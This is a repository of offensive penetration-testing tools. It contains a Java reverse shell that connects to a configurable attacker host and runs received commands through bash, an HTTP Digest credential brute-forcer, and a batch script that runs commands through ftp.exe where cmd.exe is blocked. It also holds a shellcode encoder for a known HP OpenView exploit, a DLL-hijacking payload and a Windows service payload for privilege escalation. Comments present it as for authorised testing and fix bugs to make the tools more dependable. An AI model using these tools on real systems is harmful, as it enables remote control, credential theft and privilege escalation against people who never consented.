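// Repository contents: README.md ("Random stuff"), ReverseShell.java, digest_bf.py,
// ftp_shell.bat, muts_encoder.py, windows_dll.c, windows_service.c
//
// ReverseShell.java -- minimal Java reverse shell for authorised testing.
//
// Change ATTACKER_HOST / ATTACKER_PORT below, or pass them on the command line.
// Run: javac ReverseShell.java && java ReverseShell [host] [port]
//
// Protocol: every line received on the socket is run through `/bin/bash -c`
// and the command's combined stdout/stderr is written back line by line.

import java.net.*;
import java.io.*;

class ReverseShell {
    // Defaults used when no arguments are given. They are deliberately not valid
    // values: an unedited copy fails at start-up instead of connecting somewhere.
    private static final String ATTACKER_HOST = "ATTACKER-IP-HERE";
    private static final String ATTACKER_PORT = "PORT-NUMBER-HERE";

    public static void main(String[] args) {
        String host = args.length > 0 ? args[0] : ATTACKER_HOST;
        String portText = args.length > 1 ? args[1] : ATTACKER_PORT;
        int port;
        try {
            port = Integer.parseInt(portText);
        } catch (NumberFormatException e) {
            System.err.println("Invalid port '" + portText
                    + "': edit ATTACKER_HOST/ATTACKER_PORT or pass host and port as arguments");
            return;
        }

        // try-with-resources closes the socket on disconnect or error (the original
        // never closed it).
        try (Socket socket = new Socket(host, port);
             PrintWriter socketOut = new PrintWriter(socket.getOutputStream(), true);
             BufferedReader socketIn = new BufferedReader(new InputStreamReader(socket.getInputStream()))) {

            String command;
            // readLine() returns null once the peer closes the connection; the original
            // passed that null on to exec() and died with a NullPointerException.
            while ((command = socketIn.readLine()) != null) {
                if (command.isEmpty()) {
                    continue;
                }
                runCommand(command, socketOut);
            }
        } catch (IOException e) {
            System.out.println(e);
        }
    }

    /**
     * Runs one command through bash and streams its output to the socket.
     *
     * stderr is merged into stdout: draining the two pipes one after the other
     * (as the original did) deadlocks as soon as a command fills the stderr pipe
     * buffer before stdout has been read to its end.
     */
    private static void runCommand(String command, PrintWriter socketOut) throws IOException {
        ProcessBuilder builder = new ProcessBuilder("/bin/bash", "-c", command);
        builder.redirectErrorStream(true);
        Process proc = builder.start();
        try (BufferedReader cmdOut = new BufferedReader(new InputStreamReader(proc.getInputStream()))) {
            String line;
            while ((line = cmdOut.readLine()) != null) {
                socketOut.write(line + "\n");
                socketOut.flush();
            }
        }
        try {
            proc.waitFor();   // reap the child so each command does not leave a zombie behind
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
    }
}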
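#!/usr/bin/env python
# digest_bf.py -- HTTP Digest (RFC 2617, MD5 / MD5-sess) credential brute-forcer.
#
# Runs under Python 2 and 3.  Usage:
#   python digest_bf.py http://www.domain.com/path/ users.txt rockyou.txt
#
# Every attempt fetches a fresh challenge (a nonce may be single-use), computes
# the Digest response for one username/password pair and replays it; the first
# pair that is not answered with a renewed 401 challenge is reported.
import argparse
import random
import re
from hashlib import md5

try:
    from urllib.parse import urlsplit   # Python 3
except ImportError:                     # Python 2
    from urlparse import urlsplit

# One `name=value` or `name="value"` parameter of a WWW-Authenticate challenge.
_PARAM_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|([^,\s]+))')

# Client nonces come from the OS CSPRNG; the original reused one fixed value.
_rng = random.SystemRandom()


def _h(data):
    """MD5 hex digest of a str (UTF-8 encoded) or bytes value."""
    if not isinstance(data, bytes):
        data = data.encode('utf-8')
    return md5(data).hexdigest()


def _parse_challenge(header):
    """Return the parameters of a Digest challenge as a dict (keys lower-cased).

    Quoted and bare values are both accepted, so `algorithm=MD5` and
    `algorithm="MD5"` parse the same way; the original regex only matched the
    bare form, and only when a comma followed it.
    """
    params = {}
    for key, quoted, bare in _PARAM_RE.findall(header):
        params[key.lower()] = quoted if quoted else bare
    return params


def _pick_qop(offered):
    """Choose the qop to use from the server's offer.

    Prefers 'auth', then 'auth-int'; returns None when the server offered
    nothing usable (RFC 2069 style response without nc/cnonce).  The original
    echoed the whole offer (e.g. "auth,auth-int") back as the qop, which is
    not a valid value.
    """
    if not offered:
        return None
    options = [item.strip().lower() for item in offered.split(',')]
    if 'auth' in options:
        return 'auth'
    if 'auth-int' in options:
        return 'auth-int'
    return None


def _digest_response(username, password, realm, nonce, uri, algorithm='MD5',
                     qop='auth', nc='00000001', cnonce='', method='GET', body=b''):
    """Compute the RFC 2617 `response` value for one credential pair.

    `algorithm` is MD5 or MD5-sess (case-insensitive); `qop` is 'auth',
    'auth-int' or None (RFC 2069: no nc/cnonce in the hash).  `body` is the
    request entity hashed for auth-int -- empty for a GET (the original hashed
    the 401 response body instead).  Returns the lower-case hex digest; the
    original's RFC 2069 branch returned the md5 object instead of its digest.
    """
    ha1 = _h('%s:%s:%s' % (username, realm, password))
    if 'sess' in algorithm.lower():
        # MD5-sess binds the session key to the nonce pair as well.
        ha1 = _h('%s:%s:%s' % (ha1, nonce, cnonce))
    if qop == 'auth-int':
        ha2 = _h('%s:%s:%s' % (method, uri, _h(body)))
    else:
        ha2 = _h('%s:%s' % (method, uri))
    if qop:
        return _h('%s:%s:%s:%s:%s:%s' % (ha1, nonce, nc, cnonce, qop, ha2))
    return _h('%s:%s:%s' % (ha1, nonce, ha2))


def _build_authorization(username, realm, nonce, uri, algorithm, response,
                         qop, nc, cnonce, opaque):
    """Assemble the Authorization header value.

    nc/cnonce are only sent together with a qop, and `opaque` is echoed back
    when the server supplied one (servers may reject the request without it).
    """
    parts = [
        'username="%s"' % username,
        'realm="%s"' % realm,
        'nonce="%s"' % nonce,
        'uri="%s"' % uri,
        'algorithm=%s' % algorithm,
        'response="%s"' % response,
    ]
    if qop:
        parts.append('qop=%s' % qop)
        parts.append('nc=%s' % nc)
        parts.append('cnonce="%s"' % cnonce)
    if opaque:
        parts.append('opaque="%s"' % opaque)
    return 'Digest ' + ', '.join(parts)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="url to brute force (http://www.domain.com/path/)")
    parser.add_argument("userlist", help="path to a file that contains usernames (/usr/share/wordlists/users.txt)")
    parser.add_argument("passlist", help="path to a file that contains passwords (/usr/share/wordlists/rockyou.txt)")
    parser.add_argument("--timeout", type=float, default=10.0,
                        help="per-request timeout in seconds (default: 10)")
    args = parser.parse_args()

    # Third-party; imported here so the digest helpers above stay importable
    # (and testable) without it.
    import requests

    url = args.target
    # The digest `uri` must be exactly the request-target we send, so derive it
    # from the parsed URL instead of slicing at a fixed offset.  Only an empty
    # path gets a '/' appended; an explicit path is used as given.
    split = urlsplit(url)
    if not split.path:
        url = url + '/'
        split = urlsplit(url)
    digest_uri = split.path + ('?' + split.query if split.query else '')

    nc = "00000001"   # every attempt uses a fresh nonce, so the count never advances
    msg_counter = 0

    with open(args.userlist) as usernames:
        for username in usernames:
            username = username.strip()
            if not username:
                continue
            with open(args.passlist) as passwords:
                for password in passwords:
                    # Only strip the line ending: passwords may legitimately
                    # start or end with spaces.
                    password = password.rstrip('\r\n')
                    msg_counter = (msg_counter + 1) % 20

                    # Fresh challenge per attempt: servers may reject nonce reuse.
                    resp = requests.get(url, timeout=args.timeout)
                    challenge = resp.headers.get('www-authenticate', '')
                    if resp.status_code != 401 or not challenge.lower().startswith('digest'):
                        print('[-] %s did not answer with a Digest challenge (HTTP %d)'
                              % (url, resp.status_code))
                        return
                    params = _parse_challenge(challenge)
                    realm = params.get('realm', '')
                    nonce = params.get('nonce', '')
                    algorithm = params.get('algorithm', 'MD5')
                    qop = _pick_qop(params.get('qop'))
                    cnonce = '%016x' % _rng.getrandbits(64)

                    response = _digest_response(username, password, realm, nonce, digest_uri,
                                                algorithm=algorithm, qop=qop, nc=nc, cnonce=cnonce)
                    headers = {'Authorization': _build_authorization(
                        username, realm, nonce, digest_uri, algorithm, response,
                        qop, nc, cnonce, params.get('opaque'))}

                    resp = requests.get(url, headers=headers, timeout=args.timeout)
                    if resp.status_code != 401:
                        # Anything but a renewed challenge means the credentials
                        # were accepted (a 5xx here is worth checking by hand).
                        print('[+] Found credentials - %s:%s (HTTP %d)'
                              % (username, password, resp.status_code))
                        return

                    if msg_counter == 0:
                        print('[-] Trying - %s:%s' % (username, password))

    print('[-] Brute force completed.')


if __name__ == "__main__":
    main()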
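@echo off
rem ftp_shell.bat -- interactive command runner that uses ftp.exe's "!" escape.
rem
rem Each command typed at the prompt is written to a script file as
rem   !<command> > <output file>
rem and fed to "ftp -s:", whose "!" prefix runs the rest in a local shell; the
rem captured output is then printed.  Useful where cmd.exe itself is blocked
rem but ftp.exe is not.
rem Caveat: the command line goes through an unescaped "echo", so commands that
rem themselves contain > < | or & are not passed through intact.

set /p pth="Enter path to a writeable directory [c:\temp]:"
if "%pth%" == "" (
    set pth=c:\temp
)
set pth=%pth%\
set cmd_file="%pth%ftp_cmd.txt"
set output_file="%pth%ftp_output.txt"

:loop
rem "set /p" keeps the previous value when the user just presses Enter, so
rem clear it first -- otherwise an empty line re-ran the last command.
set cmd=
set /p cmd="[%cd%] "
rem Test for an empty line before any substring expansion: "%cmd:~0,2%" on an
rem unset variable expands to nothing and the "if" fails with a syntax error.
if "%cmd%" == "" (
    goto loop
)
if /i "%cmd%" == "exit" (
    if exist %cmd_file% del /f %cmd_file%
    if exist %output_file% del /f %output_file%
    set pth=
    set cmd=
    set cmd_file=
    set output_file=
    goto :eof
)
if /i "%cmd:~0,2%" == "cd" (
    pushd %cmd:~2%
    goto loop
)
echo !%cmd%^> %output_file% > %cmd_file%
echo bye>> %cmd_file%
ftp -s:%cmd_file% > nul
type %output_file% | findstr /V /R /C:"^ftp> " | findstr /V /R /C:"^bye$"
goto loop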
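#!/usr/bin/python
# ==========================================================================================
# muts_encoder v1.1
# Based on muts_encoder v1.0 BETA (19-08-2013) by Sagi Shahar (sagi-). Greetz: g0tmi1k
# ==========================================================================================
# This script automates the shellcode encoding scheme used by muts for the
# HP OpenView NNM 7.5.1 exploit (http://www.exploit-db.com/exploits/5342/):
# zero EAX with two AND instructions, then SUB three immediates made only of
# allowed bytes so that EAX ends up holding the wanted DWORD, then PUSH EAX.
#
# Output:
#   $ python muts_encoder.py 6681caff
#   [i] Checking for '0x? & 0x? = 0x0' using allowed combinations...Found!
#   [+] 0x20202020
#   [+] 0x41414141
#
#   [+] Original bytes:...0x6681caff
#   [+] Reversed bytes:...0xffca8166
#   [+] Two's complement:.0x00357e9a
#
#   [i] Checking for '0x? + 0x? + 0x? = 0x?' using allowed combinations...Found!
#   [+] 0x20392020
#   [+] 0x617e2020
#   [+] 0x7e7e3e5a
# ==========================================================================================
# How to use (according to the output above):
# Paste the addresses into metasm_shell and use metasm's output as shellcode:
#   metasm > and eax, 0x20202020      "\x25\x20\x20\x20\x20"
#   metasm > and eax, 0x41414141      "\x25\x41\x41\x41\x41"
#   metasm > sub eax, 0x20392020      "\x2d\x20\x20\x39\x20"
#   metasm > sub eax, 0x617e2020      "\x2d\x20\x20\x7e\x61"
#   metasm > sub eax, 0x7e7e3e5a      "\x2d\x5a\x3e\x7e\x7e"
#   metasm > push eax                 "\x50"
# ==========================================================================================
# Runs under Python 2 and 3.

import sys


# Functions
def reverse_bytes(hex_bytes):
    """Reverse the byte order of an even-length hex string ('6681caff' -> 'ffca8166').

    Raises ValueError for an odd number of digits (the original silently
    produced garbage pairs).
    """
    if len(hex_bytes) % 2:
        raise ValueError("hex string must have an even number of digits: %r" % hex_bytes)
    pairs = [hex_bytes[i:i + 2] for i in range(0, len(hex_bytes), 2)]
    return ''.join(reversed(pairs))


def twos_comp(hex_bytes):
    """Return the 32-bit two's complement of a hex string as 8 hex digits.

    Masked to 32 bits, so '00000000' maps to '00000000' (the original
    returned the 9-digit '100000000' for that input).
    """
    return "%08x" % ((0x100000000 - int(hex_bytes, 16)) & 0xffffffff)


def find_and_pair(chars):
    """Return two allowed bytes whose bitwise AND is 0, each repeated into a
    DWORD ('20202020', '41414141'), or None when the set holds no such pair.

    Used as `and eax, X` / `and eax, Y` to zero EAX before the SUB chain.
    The lowest pair in sorted order is returned, as before.
    """
    allowed = sorted(set(ord(c) for c in chars))
    for first in allowed:
        for second in allowed:
            if first & second == 0:
                return ("%02x" % first) * 4, ("%02x" % second) * 4
    return None


def _three_sum(wanted, allowed, allowed_set):
    """Lexicographically smallest (a, b, c) from the allowed byte set with
    a + b + c == wanted, or None.  O(n^2): c is looked up, not searched."""
    for a in allowed:
        for b in allowed:
            c = wanted - a - b
            if c in allowed_set:
                return a, b, c
    return None


def find_sub_words(value_hex, chars):
    """Find three DWORDs made only of allowed bytes whose sum is value_hex mod 2**32.

    Works column by column from the least significant byte, carrying into the
    next column: a column may overflow (a + b + c + carry_in = byte + 256),
    which the next column then absorbs.  Returns a list of three 8-digit hex
    strings, or None when some column has no solution in this character set.

    The original absorbed a pending carry by subtracting 1 from the third byte
    of the column, which could yield a byte outside the allowed set; here the
    wanted column sum is searched directly instead.
    """
    allowed = sorted(set(ord(c) for c in chars))
    allowed_set = set(allowed)
    value = int(value_hex, 16) & 0xffffffff
    columns = []      # (a, b, c) per byte, least significant first
    carry = 0
    for shift in (0, 8, 16, 24):
        byte = (value >> shift) & 0xff
        needed = byte - carry          # -1 when the byte is 0 and a carry is pending
        column = None
        for wanted in (needed, needed + 256):
            if wanted < 0:
                continue
            column = _three_sum(wanted, allowed, allowed_set)
            if column is not None:
                carry = 1 if wanted != needed else 0
                break
        if column is None:
            return None
        columns.append(column)
    # The carry out of the top column is discarded (arithmetic is mod 2**32).
    return [''.join("%02x" % columns[i][pos] for i in (3, 2, 1, 0)) for pos in range(3)]


# This is an example character-set (can replace it with your own)
char_set = (
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x30\x31\x32\x33\x34\x35\x36\x37\x38"
    "\x39\x41\x42\x43\x44\x45\x46\x47\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
    "\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d"
    "\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e"
    "\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e"
)


if __name__ == "__main__":
    # How to use
    if len(sys.argv) < 2:
        print("[-] Missing arguments: ./%s <8 hex digits>" % sys.argv[0])
        print("    Example: ./%s 41424344" % sys.argv[0])
        sys.exit(1)

    # Validate up front instead of catching arbitrary exceptions later.
    shellcode = sys.argv[1].lower()
    if shellcode.startswith("0x"):
        shellcode = shellcode[2:]
    if len(shellcode) != 8 or any(c not in "0123456789abcdef" for c in shellcode):
        print("[-] Expected exactly 8 hex digits (one DWORD), got %r" % sys.argv[1])
        sys.exit(1)

    # Checking if bitwise 'and' between two hex values will result in 0x0
    sys.stdout.write("[i] Checking for '0x? & 0x? = 0x0' using allowed combinations...")
    pair = find_and_pair(char_set)
    if pair is None:
        print("[-] Could not find a valid combination in the current character set.")
    else:
        print("Found!")
        for word in pair:
            print("[+] 0x%s" % word)

    print("\n[+] Original bytes:...0x%s" % shellcode)

    # Reversing bytes (the immediate is little-endian in the instruction)
    shellcode = reverse_bytes(shellcode)
    print("[+] Reversed bytes:...0x%s" % shellcode)

    # Calculating two's complement: sub X from 0 leaves -X, so the three
    # immediates must add up to -(wanted) mod 2**32.
    shellcode = twos_comp(shellcode)
    print("[+] Two's complement:.0x%s" % shellcode)

    # Checking if sum of three hex numbers will equal a specific predetermined hex value
    sys.stdout.write("\n[i] Checking for '0x? + 0x? + 0x? = 0x?' using allowed combinations...")
    words = find_sub_words(shellcode, char_set)
    if words is None:
        print("[-] Could not find a valid combination in the current character set.")
        sys.exit(1)
    print("Found!")
    for word in words:
        print("[+] 0x%s" % word)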
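/* ====================================================================== */
/* windows_dll.c                                                           */
/* For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll */
/* For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll   */
/*                                                                          */
/* Proof-of-concept payload DLL (DLL search-order hijacking tests): on load  */
/* it records which account loaded it, then terminates the host process.    */
/* ====================================================================== */
#include <windows.h>
#include <stdlib.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    (void)hinstDLL;
    (void)lpReserved;

    if (dwReason == DLL_PROCESS_ATTACH) {
        /* NOTE: calling system() from DllMain runs under the loader lock and
         * is officially unsupported (it can deadlock when the child-spawn
         * path loads further DLLs).  Good enough for a quick PoC; anything
         * sturdier should do its work from a thread that starts after
         * DllMain has returned.
         *
         * system() already runs the line through "cmd.exe /c".  The original
         * wrapped it in "cmd.exe /k", which keeps cmd.exe alive waiting for
         * input, so system() could block forever and ExitProcess below was
         * never reached. */
        system("whoami > C:\\Windows\\Temp\\dll.txt");

        /* Kill the host once the payload has run so it does not carry on
         * with a half-initialised DLL.  Drop this if the host must keep
         * running (e.g. a service you want to stay up). */
        ExitProcess(0);
    }
    return TRUE;
}


/* ====================================================================== */
/* windows_service.c                                                       */
/* Minimal Windows service whose only job is to run Run() (the payload);    */
/* used for weak-service-permission / unquoted-path privilege escalation.   */
/* Register it with e.g.: sc create MyService binPath= C:\path\service.exe  */
/* ====================================================================== */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define SLEEP_TIME 5000

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

/* Both callbacks are invoked by the SCM with the stdcall convention.  The
 * original declared them cdecl (int argc, char **argv / DWORD) and hid the
 * mismatch behind casts; on x86 that unbalances the stack. */
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);
void WINAPI ControlHandler(DWORD request);

/* add the payload here */
int Run(void)
{
    system("whoami > c:\\windows\\temp\\service.txt");
    return 0;
}

int main(void)
{
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;

    /* Blocks until every service in the table has stopped.  Fails with
     * ERROR_FAILED_SERVICE_CONTROLLER_CONNECT (1063) when the binary is
     * started from a console instead of by the SCM -- report that instead
     * of exiting silently. */
    if (!StartServiceCtrlDispatcher(ServiceTable)) {
        fprintf(stderr, "StartServiceCtrlDispatcher failed: %lu "
                        "(this binary must be started by the SCM)\n",
                (unsigned long)GetLastError());
        return 1;
    }
    return 0;
}

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
    (void)argc;
    (void)argv;

    /* SERVICE_WIN32 is the OWN|SHARE enumeration mask; OWN_PROCESS is the
     * type documented for a service that runs in its own executable. */
    ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
    ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint = 0;
    ServiceStatus.dwWaitHint = 0;

    hStatus = RegisterServiceCtrlHandler("MyService", ControlHandler);
    if (hStatus == (SERVICE_STATUS_HANDLE)0) {
        /* No handle means nobody to report status to; the original went on
         * and called SetServiceStatus with a null handle. */
        return;
    }

    /* Report RUNNING before doing any work: the SCM only waits a limited
     * time in START_PENDING, so a payload that blocks (reverse shell, slow
     * command) in the original order made the start time out and the
     * process get killed before or during the payload. */
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);

    Run();

    /* Stay alive until ControlHandler flips the state to STOPPED. */
    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {
        Sleep(SLEEP_TIME);
    }
}

void WINAPI ControlHandler(DWORD request)
{
    switch (request) {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        /* Stop and shutdown are handled identically: report STOPPED, which
         * also ends the wait loop in ServiceMain. */
        ServiceStatus.dwWin32ExitCode = 0;
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        break;

    default:
        /* SERVICE_CONTROL_INTERROGATE and anything else: re-report the
         * current status unchanged. */
        break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
}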